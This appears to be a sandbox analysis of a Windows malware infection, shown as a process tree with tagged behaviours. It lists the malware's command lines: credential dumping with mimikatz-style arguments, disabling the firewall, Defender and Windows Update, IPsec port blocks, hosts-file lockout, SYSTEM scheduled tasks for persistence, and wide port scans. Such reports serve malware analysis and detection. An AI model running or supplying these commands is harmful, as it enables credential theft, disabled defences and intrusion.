C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4004
-
-
C:\Windows\mgifenbt\jirnzjt.exeC:\Windows\mgifenbt\jirnzjt.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2916
-
-
-
C:\Windows\mgifenbt\jirnzjt.exeC:\Windows\mgifenbt\jirnzjt.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1328 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1384
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:1260
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5036
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:964
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4960
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:3832
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2452
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3408
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3440
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\etqajulug\ekithtuut\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Windows\etqajulug\ekithtuut\wpcap.exeC:\Windows\etqajulug\ekithtuut\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:3340
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4808 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:1536
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:4640
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:372
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:3764
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:2840
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:1116
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:4644
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:3108
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:4780 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:4436
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\etqajulug\ekithtuut\llefvytvt.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\etqajulug\ekithtuut\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:2792 -
C:\Windows\etqajulug\ekithtuut\llefvytvt.exeC:\Windows\etqajulug\ekithtuut\llefvytvt.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\etqajulug\ekithtuut\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3880
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\etqajulug\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\etqajulug\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2412 -
C:\Windows\etqajulug\Corporate\vfshost.exeC:\Windows\etqajulug\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4516
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "mgifbllvi" /ru system /tr "cmd /c C:\Windows\ime\jirnzjt.exe"2⤵PID:624
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3596
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "mgifbllvi" /ru system /tr "cmd /c C:\Windows\ime\jirnzjt.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4844
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "entieatkh" /ru system /tr "cmd /c echo Y|cacls C:\Windows\mgifenbt\jirnzjt.exe /p everyone:F"2⤵PID:2948
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1112
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "entieatkh" /ru system /tr "cmd /c echo Y|cacls C:\Windows\mgifenbt\jirnzjt.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1624
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ilklngwgl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ibnltisvu\jngiyk.exe /p everyone:F"2⤵PID:264
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4564
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ilklngwgl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ibnltisvu\jngiyk.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3372
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4924
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2416
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3124
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2428
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3384
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2444
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4856
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4056
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1184
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3108
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2360
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:5112
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
- System Location Discovery: System Language Discovery
PID:3452 -
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵PID:4988
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
- System Location Discovery: System Language Discovery
PID:2876
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵PID:2628
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:920
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
- System Location Discovery: System Language Discovery
PID:4784 -
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4332
-
-
-
C:\Windows\TEMP\etqajulug\vrlgkrtsk.exeC:\Windows\TEMP\etqajulug\vrlgkrtsk.exe -accepteula -mp 784 C:\Windows\TEMP\etqajulug\784.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:748
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
- System Location Discovery: System Language Discovery
PID:5088 -
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
- System Location Discovery: System Language Discovery
PID:5072 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
- System Location Discovery: System Language Discovery
PID:4744
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
- System Location Discovery: System Language Discovery
PID:4516 -
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
- System Location Discovery: System Language Discovery
PID:4460 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:2196
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
- System Location Discovery: System Language Discovery
PID:2408 -
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵PID:2224
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
- System Location Discovery: System Language Discovery
PID:4768
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:3988 -
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:5100
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵PID:3344
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4316
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:3996 -
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2736
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵PID:4264
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
PID:4740
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4152
-
-
C:\Windows\TEMP\etqajulug\vrlgkrtsk.exeC:\Windows\TEMP\etqajulug\vrlgkrtsk.exe -accepteula -mp 64 C:\Windows\TEMP\etqajulug\64.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1320
-
-
C:\Windows\TEMP\etqajulug\vrlgkrtsk.exeC:\Windows\TEMP\etqajulug\vrlgkrtsk.exe -accepteula -mp 1808 C:\Windows\TEMP\etqajulug\1808.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4776
-
-
C:\Windows\TEMP\etqajulug\vrlgkrtsk.exeC:\Windows\TEMP\etqajulug\vrlgkrtsk.exe -accepteula -mp 2532 C:\Windows\TEMP\etqajulug\2532.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1900
-
-
C:\Windows\TEMP\etqajulug\vrlgkrtsk.exeC:\Windows\TEMP\etqajulug\vrlgkrtsk.exe -accepteula -mp 2804 C:\Windows\TEMP\etqajulug\2804.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3176
-
-
C:\Windows\TEMP\etqajulug\vrlgkrtsk.exeC:\Windows\TEMP\etqajulug\vrlgkrtsk.exe -accepteula -mp 2984 C:\Windows\TEMP\etqajulug\2984.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4908
-
-
C:\Windows\TEMP\etqajulug\vrlgkrtsk.exeC:\Windows\TEMP\etqajulug\vrlgkrtsk.exe -accepteula -mp 700 C:\Windows\TEMP\etqajulug\700.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4744
-
-
C:\Windows\TEMP\etqajulug\vrlgkrtsk.exeC:\Windows\TEMP\etqajulug\vrlgkrtsk.exe -accepteula -mp 3732 C:\Windows\TEMP\etqajulug\3732.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2172
-
-
C:\Windows\TEMP\etqajulug\vrlgkrtsk.exeC:\Windows\TEMP\etqajulug\vrlgkrtsk.exe -accepteula -mp 3824 C:\Windows\TEMP\etqajulug\3824.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4076
-
-
C:\Windows\TEMP\etqajulug\vrlgkrtsk.exeC:\Windows\TEMP\etqajulug\vrlgkrtsk.exe -accepteula -mp 3888 C:\Windows\TEMP\etqajulug\3888.dmp2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3920
-
-
C:\Windows\TEMP\etqajulug\vrlgkrtsk.exeC:\Windows\TEMP\etqajulug\vrlgkrtsk.exe -accepteula -mp 3972 C:\Windows\TEMP\etqajulug\3972.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3164
-
-
C:\Windows\TEMP\etqajulug\vrlgkrtsk.exeC:\Windows\TEMP\etqajulug\vrlgkrtsk.exe -accepteula -mp 2912 C:\Windows\TEMP\etqajulug\2912.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4372
-
-
C:\Windows\TEMP\etqajulug\vrlgkrtsk.exeC:\Windows\TEMP\etqajulug\vrlgkrtsk.exe -accepteula -mp 4244 C:\Windows\TEMP\etqajulug\4244.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4984
-
-
C:\Windows\TEMP\etqajulug\vrlgkrtsk.exeC:\Windows\TEMP\etqajulug\vrlgkrtsk.exe -accepteula -mp 3628 C:\Windows\TEMP\etqajulug\3628.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4776
-
-
C:\Windows\TEMP\etqajulug\vrlgkrtsk.exeC:\Windows\TEMP\etqajulug\vrlgkrtsk.exe -accepteula -mp 3352 C:\Windows\TEMP\etqajulug\3352.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2636
-
-
C:\Windows\TEMP\etqajulug\vrlgkrtsk.exeC:\Windows\TEMP\etqajulug\vrlgkrtsk.exe -accepteula -mp 1084 C:\Windows\TEMP\etqajulug\1084.dmp2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4916
-
-
C:\Windows\TEMP\etqajulug\vrlgkrtsk.exeC:\Windows\TEMP\etqajulug\vrlgkrtsk.exe -accepteula -mp 3796 C:\Windows\TEMP\etqajulug\3796.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4172
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\etqajulug\ekithtuut\scan.bat2⤵PID:4192
-
C:\Windows\etqajulug\ekithtuut\lsivtqwuf.exelsivtqwuf.exe TCP 181.215.0.1 181.215.255.255 7001 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:1248
-
-
C:\Windows\etqajulug\ekithtuut\lsivtqwuf.exelsivtqwuf.exe TCP 196.120.0.1 196.120.255.255 7001 512 /save3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1872
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵PID:2560
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:5228
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:5220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5168
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:5156
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3596
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:5084
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
PID:3232 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1516
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:2644
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:6108
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:3556
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:5132
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:760
-
-
-
C:\Windows\TEMP\etqajulug\vrlgkrtsk.exeC:\Windows\TEMP\etqajulug\vrlgkrtsk.exe -accepteula -mp 784 C:\Windows\TEMP\etqajulug\784.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5680
-
-
C:\Windows\TEMP\etqajulug\vrlgkrtsk.exeC:\Windows\TEMP\etqajulug\vrlgkrtsk.exe -accepteula -mp 64 C:\Windows\TEMP\etqajulug\64.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5920
-
-
C:\Windows\TEMP\etqajulug\vrlgkrtsk.exeC:\Windows\TEMP\etqajulug\vrlgkrtsk.exe -accepteula -mp 1808 C:\Windows\TEMP\etqajulug\1808.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1524
-
-
C:\Windows\TEMP\etqajulug\vrlgkrtsk.exeC:\Windows\TEMP\etqajulug\vrlgkrtsk.exe -accepteula -mp 2532 C:\Windows\TEMP\etqajulug\2532.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:6036
-
-
C:\Windows\TEMP\etqajulug\vrlgkrtsk.exeC:\Windows\TEMP\etqajulug\vrlgkrtsk.exe -accepteula -mp 2804 C:\Windows\TEMP\etqajulug\2804.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:964
-
-
C:\Windows\TEMP\etqajulug\vrlgkrtsk.exeC:\Windows\TEMP\etqajulug\vrlgkrtsk.exe -accepteula -mp 2984 C:\Windows\TEMP\etqajulug\2984.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:976
-
-
C:\Windows\TEMP\etqajulug\vrlgkrtsk.exeC:\Windows\TEMP\etqajulug\vrlgkrtsk.exe -accepteula -mp 700 C:\Windows\TEMP\etqajulug\700.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:920
-
-
C:\Windows\TEMP\etqajulug\vrlgkrtsk.exeC:\Windows\TEMP\etqajulug\vrlgkrtsk.exe -accepteula -mp 3732 C:\Windows\TEMP\etqajulug\3732.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5844
-
-
C:\Windows\TEMP\etqajulug\vrlgkrtsk.exeC:\Windows\TEMP\etqajulug\vrlgkrtsk.exe -accepteula -mp 3824 C:\Windows\TEMP\etqajulug\3824.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2456
-
-
C:\Windows\TEMP\etqajulug\vrlgkrtsk.exeC:\Windows\TEMP\etqajulug\vrlgkrtsk.exe -accepteula -mp 3888 C:\Windows\TEMP\etqajulug\3888.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4864
-
-
C:\Windows\TEMP\etqajulug\vrlgkrtsk.exeC:\Windows\TEMP\etqajulug\vrlgkrtsk.exe -accepteula -mp 3972 C:\Windows\TEMP\etqajulug\3972.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3964
-
-
C:\Windows\TEMP\etqajulug\vrlgkrtsk.exeC:\Windows\TEMP\etqajulug\vrlgkrtsk.exe -accepteula -mp 2912 C:\Windows\TEMP\etqajulug\2912.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5176
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
PID:748 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4652
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:5240
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1232
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:3064
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:776
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:2624
-
-
-
C:\Windows\TEMP\etqajulug\vrlgkrtsk.exeC:\Windows\TEMP\etqajulug\vrlgkrtsk.exe -accepteula -mp 4244 C:\Windows\TEMP\etqajulug\4244.dmp2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2596
-
-
C:\Windows\TEMP\etqajulug\vrlgkrtsk.exeC:\Windows\TEMP\etqajulug\vrlgkrtsk.exe -accepteula -mp 3628 C:\Windows\TEMP\etqajulug\3628.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5520
-
-
C:\Windows\TEMP\etqajulug\vrlgkrtsk.exeC:\Windows\TEMP\etqajulug\vrlgkrtsk.exe -accepteula -mp 3796 C:\Windows\TEMP\etqajulug\3796.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5676
-
-
C:\Windows\TEMP\etqajulug\vrlgkrtsk.exeC:\Windows\TEMP\etqajulug\vrlgkrtsk.exe -accepteula -mp 4192 C:\Windows\TEMP\etqajulug\4192.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3196
-
-
C:\Windows\SysWOW64\skwigk.exeC:\Windows\SysWOW64\skwigk.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1116
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:680
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\mgifenbt\jirnzjt.exe /p everyone:F1⤵PID:5100
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:2948
-
-
C:\Windows\system32\cacls.execacls C:\Windows\mgifenbt\jirnzjt.exe /p everyone:F2⤵PID:3392
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\jirnzjt.exe1⤵PID:2304
-
C:\Windows\ime\jirnzjt.exeC:\Windows\ime\jirnzjt.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1496
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ibnltisvu\jngiyk.exe /p everyone:F1⤵PID:3456
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:4516
-
-
